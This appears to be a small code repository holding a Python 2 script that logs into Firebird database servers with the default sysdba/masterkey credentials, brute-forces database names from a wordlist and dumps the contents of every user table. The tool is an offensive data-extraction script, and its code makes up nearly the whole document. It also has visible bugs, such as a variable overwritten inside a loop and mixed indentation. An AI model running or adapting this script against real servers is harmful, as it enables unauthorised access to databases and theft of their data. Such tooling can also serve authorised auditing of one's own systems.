├── README.md
└── firebirdBrute.py


/README.md:
--------------------------------------------------------------------------------
1 | # firebirdDump
2 | Uses the default firebird database credentials to perform a database dump
3 | 


--------------------------------------------------------------------------------
/firebirdBrute.py:
--------------------------------------------------------------------------------
 1 | import argparse
 2 | import sys
 3 | import time
 4 | 
 5 | wordList=""
 6 | try:
 7 |         import firebirdsql
 8 | except:
 9 |         print "Download pyfirebirdsql from https://github.com/nakagami/pyfirebirdsql.git"
10 | 	sys.exit()
11 | 
12 | def extractDB(database,ipAddr):
13 | 	con = firebirdsql.connect(
14 |   		host=ipAddr, database=database,
15 |     		user='sysdba', password='masterkey'
16 | 	)
17 | 	cur = con.cursor()
18 | 	cur.execute("select rdb$relation_name from rdb$relations where rdb$view_blr is null and (rdb$system_flag is null or rdb$system_flag = 0);")
19 | 	results = cur.fetchall()
20 | 	print "\n- Found the below tables"
21 | 	for x in results:
22 | 		print x[0]
23 | 
24 | 	for x in results:
25 | 		print "\n- Extracing the contents from the table: "+x[0]
26 | 		cur.execute("select * from "+x[0]+";")
27 | 		results = cur.fetchall()
28 | 		for line in results:
29 | 			print line
30 | 
31 | def getDatabase(ipAddr,con):
32 | 	defaultDB="C:\\PROGRAM FILES\\FIREBIRD\\FIREBIRD_2_5\\EXAMPLES\\EMPBUILD\\EMPLOYEE.FDB"
33 | 
34 | 	results = con.getAttachedDatabaseNames()
35 | 	print results
36 | 	dbList=[]
37 | 	if len(results)>0:
38 | 		for x in results:
39 | 			if x!=defaultDB:
40 | 				#Remove the default database
41 | 				dbList.append(x)
42 | 		print "\n- Found the below connected databases"
43 | 		for x in dbList:
44 | 			print x
45 | 		for x in dbList:
46 | 			print "\n- Extracting contents from Firebird database: "+x		
47 | 			extractDB(x,ipAddr)
48 | 	else:
49 | 		#Brutefoorce firebird databasess
50 | 		print "\n- Bruteforcing Firebird database names"
51 | 		dictList=[]
52 | 		with open(wordList) as f:
53 |     			dictList = f.read().splitlines()
54 | 		currentWord=""
55 | 		for word in dictList:
56 | 			currentWord=word
57 | 			try:
58 | 				con = firebirdsql.connect(
59 |    					host=ipAddr, database=word,
60 |     					user='sysdba', password='masterkey'
61 | 				)
62 | 				print "Correct database name: "+word
63 | 				break
64 | 			except firebirdsql.OperationalError:
65 | 				print "Incorrect database name: "+word
66 | 				continue	
67 | 		extractDB(currentWord,ipAddr)
68 | 
69 | def connectFirebird(ipAddr):
70 | 	try:
71 | 		#Try getting list of connected databases without attempting any database name guess.
72 | 		con = firebirdsql.services.connect(host=ipAddr, user='sysdba', password='masterkey', timeout=5)
73 | 	except Exception as e:
74 | 		#if "Timed Out" in e:
75 | 		#	print "- Timed out"
76 | 		print e
77 | 		sys.exit()
78 | 	getDatabase(ipAddr,con)
79 | 
80 | if __name__ == '__main__':
81 | 	print "This tool attempts to brute force the database names on the Firebird database server using the default credentials (sysdba|masterkey)"
82 |  	parser = argparse.ArgumentParser()
83 |     	parser.add_argument('-host', dest='ipAddr',  action='store', help='[IP address of Firebird database server]')
84 |     	parser.add_argument('-wordlist', dest='wordList',  action='store', help='[File containing list of database names to brute force]')
85 | 
86 |     	if len(sys.argv)==1:
87 |         	parser.print_help()
88 |         	sys.exit(1)
89 | 	options = parser.parse_args()
90 | 	if options.wordList:
91 | 		wordList=options.wordList
92 |    	if options.ipAddr:
93 | 		connectFirebird(options.ipAddr)
94 | 


--------------------------------------------------------------------------------